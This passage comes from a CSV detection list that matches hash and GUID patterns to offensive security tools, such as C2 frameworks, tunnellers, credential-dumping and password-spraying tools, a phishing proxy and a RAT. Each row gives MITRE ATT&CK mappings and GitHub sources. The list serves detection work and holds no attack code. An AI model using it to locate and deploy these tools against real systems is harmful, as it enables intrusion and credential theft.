T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*27e71eebac244f803d825159fe3b1971c9bfb169*",".{0,1000}27e71eebac244f803d825159fe3b1971c9bfb169.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*27F85701-FD37-4D18-A107-20E914F8E779*",".{0,1000}27F85701\-FD37\-4D18\-A107\-20E914F8E779.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*284aac919a7582ec6ec1d6c71656c8177c56c1b8734834f66bc17b6d59e74b3c*",".{0,1000}284aac919a7582ec6ec1d6c71656c8177c56c1b8734834f66bc17b6d59e74b3c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*285ee27ec825b9a981a36594658a7943eba63fe0b4237f0110cc57729fbf3b76*",".{0,1000}285ee27ec825b9a981a36594658a7943eba63fe0b4237f0110cc57729fbf3b76.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*286b57ee049f0d59eac77af0171bbe4d21c5e2e6ea89a0b1847c5b1fea2a9cb0*",".{0,1000}286b57ee049f0d59eac77af0171bbe4d21c5e2e6ea89a0b1847c5b1fea2a9cb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*287f0bded23d895ed013d7d66f062560b983f1ed8881d59e0ab7e9374bd76c73*",".{0,1000}287f0bded23d895ed013d7d66f062560b983f1ed8881d59e0ab7e9374bd76c73.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*28d2ed9659825ef2b0d27409423ead074c9fb88f28b2186a79bf0f849beee0f1*",".{0,1000}28d2ed9659825ef2b0d27409423ead074c9fb88f28b2186a79bf0f849beee0f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*28dd3615a9603eb17b828c09dbc2d7eb66ff096389c76b383076bda48ee146b2*",".{0,1000}28dd3615a9603eb17b828c09dbc2d7eb66ff096389c76b383076bda48ee146b2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after 
the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*28F9E001-67E0-4200-B120-3021596689E9*",".{0,1000}28F9E001\-67E0\-4200\-B120\-3021596689E9.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*29036ee321d9b71ca990840cc14527ea83a24b968d0443b155a18c388f667244*",".{0,1000}29036ee321d9b71ca990840cc14527ea83a24b968d0443b155a18c388f667244.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*291e64d8729dd0c25a58e3ed6b377e519c3cdbfa962ee88b15f950e1449363f5*",".{0,1000}291e64d8729dd0c25a58e3ed6b377e519c3cdbfa962ee88b15f950e1449363f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*292a7cd013a3291a7d1b0004c6da3ce863dcca353f77935b385e97649eac39d4*",".{0,1000}292a7cd013a3291a7d1b0004c6da3ce863dcca353f77935b385e97649eac39d4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*293425d211b70219ee0ca753b3fcd56b44c369db44d9a7509614d31505b7e0e4*",".{0,1000}293425d211b70219ee0ca753b3fcd56b44c369db44d9a7509614d31505b7e0e4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*29446C11-A1A5-47F6-B418-0D699C6C3339*",".{0,1000}29446C11\-A1A5\-47F6\-B418\-0D699C6C3339.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*2944dbfc-8a1e-4759-a8a2-e4568950601d*",".{0,1000}2944dbfc\-8a1e\-4759\-a8a2\-e4568950601d.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*295850b32709c33d6cf6719301a9a26b29294f6edda200320e6869ff660915ba*",".{0,1000}295850b32709c33d6cf6719301a9a26b29294f6edda200320e6869ff660915ba.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*29601a1a4939f36c5d6995124862ce5c3c7e2a64b230fd9f1c04f0f52558b5ad*",".{0,1000}29601a1a4939f36c5d6995124862ce5c3c7e2a64b230fd9f1c04f0f52558b5ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*",".{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*298047e6ce299b73ea411a8ed2d67484db6c8c276a299403e0b9766cc9079456*",".{0,1000}298047e6ce299b73ea411a8ed2d67484db6c8c276a299403e0b9766cc9079456.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - 
TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*29a507e37ad10b3ed522b8a524fa2d8f99978f42f16bffb9872d855c53345ca9*",".{0,1000}29a507e37ad10b3ed522b8a524fa2d8f99978f42f16bffb9872d855c53345ca9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*29b1014789a969ec7aafc64bd17de1483775e2199de791b622718bb11be69729*",".{0,1000}29b1014789a969ec7aafc64bd17de1483775e2199de791b622718bb11be69729.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*29CBBC24-363F-42D7-B018-5EF068BA8777*",".{0,1000}29CBBC24\-363F\-42D7\-B018\-5EF068BA8777.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" 
"*29CFAA16-9277-4EFB-9E91-A7D11225160B*",".{0,1000}29CFAA16\-9277\-4EFB\-9E91\-A7D11225160B.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","0","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*29d30b556932d0657f14a0b290ec79d23f88d8454ca27151c8348ab7e4be9657*",".{0,1000}29d30b556932d0657f14a0b290ec79d23f88d8454ca27151c8348ab7e4be9657.{0,1000}","offensive_tool_keyword","SharpHose","Asynchronous Password Spraying Tool in C# for Windows Environments","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/ustayready/SharpHose","1","0","N/A","10","4","301","63","2023-12-19T21:06:47Z","2020-05-01T22:10:49Z" "*2a0d512c0fbacaa2029dd11e588342e80bd47927a0fa7535c75714aed2404232*",".{0,1000}2a0d512c0fbacaa2029dd11e588342e80bd47927a0fa7535c75714aed2404232.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2a1482c944f5e27e23b23040a60c2dcebe263d1b3d071fbbea363707306733a6*",".{0,1000}2a1482c944f5e27e23b23040a60c2dcebe263d1b3d071fbbea363707306733a6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2a3035797a103e527b1645cb90fccf165b76deea5b1526d80f66e32f5082e0d0*",".{0,1000}2a3035797a103e527b1645cb90fccf165b76deea5b1526d80f66e32f5082e0d0.{0,1000}","offensive_tool_keyword","Accomplice","Tools for 
discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*2a306de4565a13893b191df6e8d43b7570c0e3a3d9aa841d6d65cd843f66d220*",".{0,1000}2a306de4565a13893b191df6e8d43b7570c0e3a3d9aa841d6d65cd843f66d220.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2a363206ab10c7d679055b32bbd73782aff91263f9325e179a2f03f6bca0f55a*",".{0,1000}2a363206ab10c7d679055b32bbd73782aff91263f9325e179a2f03f6bca0f55a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2a46df8322062f52a20c78eb93d7b068b61037db2ce48edcb9f8beda43dd8ede*",".{0,1000}2a46df8322062f52a20c78eb93d7b068b61037db2ce48edcb9f8beda43dd8ede.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*2a5afbf327864c6b682b15d893504d9e3757e83522ac32e848e69a5e496e1fce*",".{0,1000}2a5afbf327864c6b682b15d893504d9e3757e83522ac32e848e69a5e496e1fce.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2a7c53ab30b10ad3b6c82d1f057a094ecd68975f7c81becd2ba1f9519e8cf340*",".{0,1000}2a7c53ab30b10ad3b6c82d1f057a094ecd68975f7c81becd2ba1f9519e8cf340.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2a8b77cd55cc43d79d9c4475cc9287360f6fd3dc47a07f83ff33853de1652f7d*",".{0,1000}2a8b77cd55cc43d79d9c4475cc9287360f6fd3dc47a07f83ff33853de1652f7d.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*2a9cd5021cf8f43304a9ecc91759b534aad0efff59d9da57ca666c8b5f8ce819*",".{0,1000}2a9cd5021cf8f43304a9ecc91759b534aad0efff59d9da57ca666c8b5f8ce819.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*2aa583cf99e14b810027715517aa588c0261a8df80fcb8018c29d2ff5d8777f3*",".{0,1000}2aa583cf99e14b810027715517aa588c0261a8df80fcb8018c29d2ff5d8777f3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*2ab5af4a7fa7d14b4a4facef9b4d80bd3ada7e20c36712ece61ce9c294107745*",".{0,1000}2ab5af4a7fa7d14b4a4facef9b4d80bd3ada7e20c36712ece61ce9c294107745.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*2AE886C3-3272-40BE-8D3C-EBAEDE9E61E1*",".{0,1000}2AE886C3\-3272\-40BE\-8D3C\-EBAEDE9E61E1.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*2afcf7aa79d17989aac2b1b3ecca95d2c30659a951d4626e4f0d0fc73e1093f3*",".{0,1000}2afcf7aa79d17989aac2b1b3ecca95d2c30659a951d4626e4f0d0fc73e1093f3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2b6e6ca400190f98d1bf00cc5d50c728364c75db258043fe26b5f014c19c7188*",".{0,1000}2b6e6ca400190f98d1bf00cc5d50c728364c75db258043fe26b5f014c19c7188.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*2B914EE7-F206-4A83-B435-460D054315BB*",".{0,1000}2B914EE7\-F206\-4A83\-B435\-460D054315BB.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*2ba17d622736a4d3132c17db3b8c725f001fdbe7fca4b9b4248262b5e54a4107*",".{0,1000}2ba17d622736a4d3132c17db3b8c725f001fdbe7fca4b9b4248262b5e54a4107.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*2ba719023361de2ac1f7c68c9d4081860aa70eca707662e142f89048d7a89859*",".{0,1000}2ba719023361de2ac1f7c68c9d4081860aa70eca707662e142f89048d7a89859.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2bd33a784af634af7590ad9dc43d574005dd95b2b2e20640b97cff0474af91c6*",".{0,1000}2bd33a784af634af7590ad9dc43d574005dd95b2b2e20640b97cff0474af91c6.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 
- T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*2bdfb1a641d40f9036e7f68adb158f4acd83a358af9a888e4e3e6ae757ea9b8d*",".{0,1000}2bdfb1a641d40f9036e7f68adb158f4acd83a358af9a888e4e3e6ae757ea9b8d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2C059FE7-C868-4C6D-AFA0-D62BA3C1B2E1*",".{0,1000}2C059FE7\-C868\-4C6D\-AFA0\-D62BA3C1B2E1.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*2c08ea21df4710665340d0e5c3166db390dbc1edeb5ea9cd00f3d80c2523ac07*",".{0,1000}2c08ea21df4710665340d0e5c3166db390dbc1edeb5ea9cd00f3d80c2523ac07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
